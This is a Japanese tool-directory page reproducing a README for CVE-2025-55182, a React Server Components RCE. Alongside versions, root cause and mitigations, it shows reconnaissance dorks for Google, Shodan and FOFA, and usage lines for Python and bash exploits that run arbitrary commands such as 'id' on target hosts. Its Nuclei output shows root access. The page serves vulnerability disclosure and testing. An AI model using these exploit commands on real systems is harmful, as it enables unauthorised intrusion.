Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182 — React Server Components (RSC) の実装に影響を与える重大なリモートコード実行 (RCE) 脆弱性が、複数のパッケージ内で、以下を含む。 | Kitploit
ツール/GitHubGitHub/cyberleelawat/cve-2025-55182
脆弱性スキャナー脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト学習と教育ペイロード開発
GitHubcyberleelawat/cve-2025-55182

CVE-2025-55182

React Server Components (RSC) の実装に影響を与える重大なリモートコード実行 (RCE) 脆弱性が、複数のパッケージ内で、以下を含む。

リポジトリを見る
112ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55182 – React Server Components リモートコード実行

React2Shell Banner CVE-2025-55182 CVE-2025-66478 CVSS

作成者 : Virendra Kumar

会社 : Cyber Leelawat

ウェブサイト :

www.cyberleelawat.in

概要

CVE-2025-55182 は、複数のパッケージ内の React Server Components (RSC) 実装に影響を与える深刻なリモートコード実行 (RCE) 脆弱性です。対象パッケージは次のとおりです。

  • react-server-dom-webpack
  • react-server-dom-turbopack
  • react-server-dom-parcel

この脆弱性は、RSC が使用する内部 Flight プロトコルを介して送信されたペイロードの安全でないデシリアライゼーションに起因します。信頼できない入力が HTTP リクエストを介して React Server Components を通過すると、サーバーサイドのコード実行がトリガーされる可能性があります。

影響を受けるバージョンは次のとおりです。

  • 19.0.0
  • 19.1.0
  • 19.1.1
  • 19.2.0

修正済みバージョンは次のとおりです。

  • 19.0.1
  • 19.1.2
  • 19.2.1

脆弱性の仕組み (高レベル)

React Server Components は、バックエンドで解析およびデシリアライズされるクライアントサイドのリクエストを受け入れます。この脆弱性は、受信データのデシリアライズに関する制御が不十分であることに起因し、特別に細工されたペイロードが実行可能なサーバーサイドコンポーネントとして解釈されることを可能にします。

これが発生すると、サーバー上で任意の JavaScript が実行される可能性があり、ホスティング環境と権限によってはサーバー全体が危険にさらされる可能性があります。


根本原因

  • RSC Flight プロトコルストリームにおける適切な入力検証の欠如
  • サーバーの信頼境界が誤って安全であると想定されている
  • 信頼できないユーザー入力からの安全でないサーバーサイド解析

影響

悪用された場合、攻撃者は以下のことが可能になる可能性があります。

  • リモートコード実行を達成する
  • 任意のサーバーサイドコマンドを実行する
  • データベースや OS レベルのリソースにアクセスする
  • マルウェアやバックドアをインストールする
  • 機密データを盗み出す
  • インフラストラクチャ内でラテラルムーブメントを実行する

CVSS スコア: 10.0 – 緊急


手動テスト (安全な防御的識別)

主な目的:

アプリケーションが React Server Components を公開しているかどうか、および影響を受けるバージョンが使用されているかどうかを確認します。

ステップ 1 — 応答特性による RSC の存在確認

root@kitploit:~
curl -I https://target.com/?__rsc=1

Google リコネッサンス (防御的キーワード)

これらのキーワードは、公開リポジトリまたは Web アプリケーションが RSC コンポーネントを参照しているかどうかを特定するのに役立ちます。

root@kitploit:~
"React Server Components" "Flight" inurl:src
"react-server-dom-webpack" filetype:lock
"server.references" "react"
"rsc" "react-dom"

確認項目:

  • RSC 機能が存在するか?
  • フロントエンドバンドルにパッケージが表示されるか?
  • 公開 Git 参照があるか?

内部 Google クエリの例 (自組織のスコープのみ)

root@kitploit:~
site:yourdomain.com "react-server"
site:yourdomain.com "flight" "react"
site:yourdomain.com "rsc"

自組織のドメインの内部監査のみを目的としています。


Shodan (安全な技術フィンガープリンティング)

露出したフレームワークの使用を確認し、脆弱性の悪用は行いません。

root@kitploit:~
http.title:"Next.js"
"powered by" "Next.js"
X-Powered-By: Next.js
http.favicon.hash=

FOFA 技術分類のみ

root@kitploit:~
title="Next.js"
header="next-router-state-tree"
body="/_next/static/"
server="next"

自動テスト (内部 / ラボ)

防御的なスキャンを自動化するには、テンプレートベースの検出ロジックをクローンして、自社のインフラストラクチャ評価に使用します。

root@kitploit:~
git clone https://github.com/cyberleelawat/CVE-2025-55182.git
cd CVE-2025-55182

Nuclei テンプレート

root@kitploit:~
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml

[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.

Python RCE エクスプロイト (CVE-2025-55182.py)

任意のコマンドを実行し、出力を取得するフル機能のRCEエクスプロイトスクリプトです。

使用方法:

root@kitploit:~
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"

Bash Exploit

インストール

root@kitploit:~
chmod +x scanner.sh

使用方法

root@kitploit:~
# Scan with default command (id)
./scanner.sh -d example.com

# Execute custom command
./scanner.sh -d example.com -c "whoami"

# With full URL
./scanner.sh -d https://example.com -c "uname -a"

オプション

  • -d, --domain - ターゲットドメイン/URL (必須)
  • -c, --command - 実行するコマンド (デフォルト: id)

使用例

root@kitploit:~
# Check if target is vulnerable
./scanner.sh -d vulnerable-app.com

# Get system information
./scanner.sh -d vulnerable-app.com -c "uname -a"

# List files
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"

必要条件

  • Bash
  • curl
  • openssl

クレジット: Bash および Python スクリプトは @zack0x01 と @sickwell によって作成されました。感謝して使用しています。

リポジトリ内のテンプレートは以下の目的で使用されます。

  • バージョン識別
  • 可視性チェック
  • インフラストラクチャインベントリ
  • 脆弱性認識

重要: これらのテンプレートは、所有しているか、評価する権限があるシステムでのみ実行する必要があります。


Nuclei (防御的使用に関する声明)

このリポジトリに含まれるテンプレートは、以下の目的にのみ使用されます。

  • 依存関係バージョンの検証
  • 間接的なフィンガープリンティング
  • パッシブチェック
  • 内部セキュリティ監査

以下のことを確認してください。

  • 書面による許可を得ていること
  • 自分の資産のみをスキャンしていること
  • 現地の法律およびポリシーを遵守していること

推奨される緩和策

直ちにアップデート

修正済みリリースのいずれかにアップグレードしてください。

  • 19.0.1
  • 19.1.2
  • 19.2.1

直ちにパッチを適用できない場合

  • RSC機能を一時的に無効にする
  • サーバーコンポーネントを分離する
  • WAFルールを実装する
  • 露出したネットワーク面を制限する

🤝 私とつながる

👨‍💻 Cyber Leelawat

セキュリティ研究者 • サイバーセキュリティトレーナー • バグバウンティハンター

モットー: Zero Trust Full Secure 🚀

GitHub Instagram
LinkedIn WhatsApp Channel
WhatsApp Group

結論

CVE-2025-55182 は現在、Reactベースのインフラストラクチャに対する最も深刻な脅威の一つです。簡単な悪用ベクトルと認証不要の攻撃面があるため、即時のパッチ適用が強く推奨されます。影響を受けるRSCバージョンを実行している組織は、緊急優先度を検討する必要があります。


法的・倫理的注意事項

このリポジトリとドキュメントは、所有する資産の防御的な研究とセキュリティ検証を目的としています。誤用は違法となる可能性があります。法律と組織のポリシーを遵守する責任はあなたにあります。

❤️ を込めて Cyber Leelawat が作成

Zero Trust Full Secure 🎯🔐

ツールをダウンロード